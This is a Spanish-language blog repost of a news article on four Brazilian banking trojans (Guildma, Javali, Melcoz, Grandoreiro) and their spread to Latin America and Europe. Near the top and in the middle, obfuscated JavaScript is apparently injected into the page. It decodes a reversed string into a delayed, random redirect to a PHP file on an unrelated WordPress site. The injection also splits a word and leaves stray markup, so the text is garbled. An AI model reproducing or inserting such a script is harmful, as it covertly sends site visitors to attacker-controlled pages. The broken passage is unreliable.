El peor virus bancario puede llegar a Argentina y dejar cuentas en cero
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>totucuman.com//uploads/2020/07/15/85063_Untitled.jpg?mrf-size=m” width=”480″ height=”286″ /></p>
<p>Cómo funcionan las nuevas amenazas brasileras que pueden llegar a la Argentina</p>
<p>Un virus bancario proveniente de Brasil afectaría a Argentina para dejar en cero las cuentas de cualquier cliente. Se trata de cibercriminales considerados hace mucho tiembpo como los más creativos inven<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tores de malware y que ahora comenzaron a exportar sus programas maliciosos para robar.
Son cuatro familias bancarias avanzadas conocidas como Guildma, Javali, Melcoz y Grandoreiro, según establecieron los investigadores de Kaspersky. Atacan a usuarios en América del Norte, Europa y ahora también América Latina. Son conocidas como Tetrade y representan las innovaciones más recientes en malware bancario, ya que implementaron una gran variedad de nuevas técnicas de evasión.
Estos malware también son conocidos como troyanos bancarios con los cuales roban credenciales para el pago electrónico y los sistemas bancarios en línea para desviar fondos de las cuentas de las víctimas.
Desde el 2011 algunos comenzaron a experimentar la exportación de troyanos básicos al extranjero, aunque con un éxito limitado. Ahora, en 2020, estas cuatro familias implementaron innovaciones para ser distribuidos a todo el mundo, según indicó Kaspersky.
¿Cómo funcionan?
Guildma existe desde 2015 y actúa principalmente a través de correos electrónicos de phishing disfrazados de notificaciones o comunicaciones comerciales legítimas.
Ahora Guildma logró nuevas técnicas de evasión y es especialmente difícil de detectar. A partir de 2019 comenzó a ocultar la carga maliciosa dentro del sistema de la víctima utilizando un formato de archivo especial. Además, almacena su comunicación con el servidor de control en un formato cifrado en las páginas de Facebook y YouTube. Este es uno de los que está llegando a otros países de América latina.
Otro troyano bancario local se lo conoce como Javali, el cual está activo desde 2017 y también se lo detectó fuera de Brasil. Está dirigido a clientes bancarios en México y también se propaga a través de correos electrónicos de phishing y comenzó a usar YouTube para alojar sus comunicaciones C2.
En el caso de Melcoz está desde 2018, y desde allí se expandió al extranjero, como México y España.
Por último, Grandoreiro comenzó a dirigirse a usuarios en América Latina antes de expandirse a países de Europa. De las cuatro familias, esta es la más extendida. Está desde 2016 y tiene un modelo de negocio de malware como servicio, es decir, diferentes ciberdelincuentes pueden comprar el acceso a las herramientas necesarias para lanzar el ataque.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.